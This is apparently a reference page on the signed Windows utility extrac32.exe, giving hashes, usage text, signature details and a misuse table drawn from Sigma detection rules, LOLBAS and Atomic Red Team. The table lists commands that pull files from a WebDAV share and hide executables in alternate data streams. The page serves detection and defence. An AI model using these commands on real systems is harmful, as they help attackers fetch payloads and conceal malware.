extrac32.exe

  • File Path: C:\Windows\SysWOW64\extrac32.exe
  • Description: Microsoft CAB File Extract Utility

Hashes

Type Hash
MD5 9472AAB6390E4F1431BAA912FCFF9707
SHA1 73EAE67D723328D609E43531E80DB37219ED5E02
SHA256 A91D32973A1097EB1131FF630B0C082406703C48B8F442955DDA184C43BCE99E
SHA384 4CC8041CC3F31EED5D5095DE077E0082674E884A6CE72B208641DE469D803796B3E71A9F978A75F27D60401E799C7979
SHA512 8671662575E3166CB31875CB618FBD7ED4BD80112AD849F05CAE28B725E1DC129A6099D00879006E4F451B64E5B8DF558A4E8C35D274ED003FB572964008E09E
SSDEEP 768:jYDhe6vo5kwydC3ryl77oOP6emNLZnlOsWLuYksMfdxH:jOheqo5k77oe6eoyBuNsMfd
IMP 7B1D3FE0DC6AA68A34FB0D96A1457FE6
PESHA1 052FD384AFA1A7883AFB02A1C1F0E05771D48B57
PE256 519EE514572F1CBAD00A931C97BEBF085FB83694044931C66AC5D46BA83888F4

Runtime Data

Usage (stdout):

Microsoft (R) Cabinet Extraction Tool
Copyright (c) Microsoft Corporation. All rights reserved..

EXTRACT [/Y] [/A] [/D | /E] [/L dir] cabinet [filename ...]
EXTRACT [/Y] source [newname]
EXTRACT [/Y] /C source destination

  cabinet  - Cabinet file (contains two or more files).
  filename - Name of the file to extract from the cabinet.
             Wild cards and multiple filenames (separated by
             blanks) may be used.

  source   - Compressed file (a cabinet with only one file).
  newname  - New filename to give the extracted file.
             If not supplied, the original name is used.

  /A         Process ALL cabinets.  Follows cabinet chain
             starting in first cabinet mentioned.
  /C         Copy source file to destination (to copy from DMF disks).
  /D         Display cabinet directory (use with filename to avoid extract).
  /E         Extract (use instead of *.* to extract all files).
  /L dir     Location to place extracted files (default is current directory).
  /Y         Do not prompt before overwriting an existing file.

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\extrac32.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: extrac32.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 5.00 (WinBuild.160101.0800)
  • Product Version: 5.00
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/75
  • VirusTotal Link: https://www.virustotal.com/gui/file/a91d32973a1097eb1131ff630b0c082406703c48b8f442955dda184c43bce99e/detection

Possible Misuse

The following table contains possible examples of extrac32.exe being misused. While extrac32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_lolbas_extrac32.yml title: Suspicious Extrac32 Execution DRL 1.0
sigma proc_creation_win_lolbas_extrac32.yml description: Download or Copy file with Extrac32 DRL 1.0
sigma proc_creation_win_lolbas_extrac32.yml - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ DRL 1.0
sigma proc_creation_win_lolbas_extrac32.yml - extrac32.exe DRL 1.0
sigma proc_creation_win_lolbas_extrac32_ads.yml title: Suspicious Extrac32 Alternate Data Stream Execution DRL 1.0
sigma proc_creation_win_lolbas_extrac32_ads.yml - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ DRL 1.0
sigma proc_creation_win_lolbas_extrac32_ads.yml - extrac32.exe DRL 1.0
LOLBAS Extrac32.yml Name: Extrac32.exe  
LOLBAS Extrac32.yml - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe  
LOLBAS Extrac32.yml - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe  
LOLBAS Extrac32.yml - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt  
LOLBAS Extrac32.yml - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe  
LOLBAS Extrac32.yml - Path: C:\Windows\System32\extrac32.exe  
LOLBAS Extrac32.yml - Path: C:\Windows\SysWOW64\extrac32.exe  
atomic-red-team T1564.004.md extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.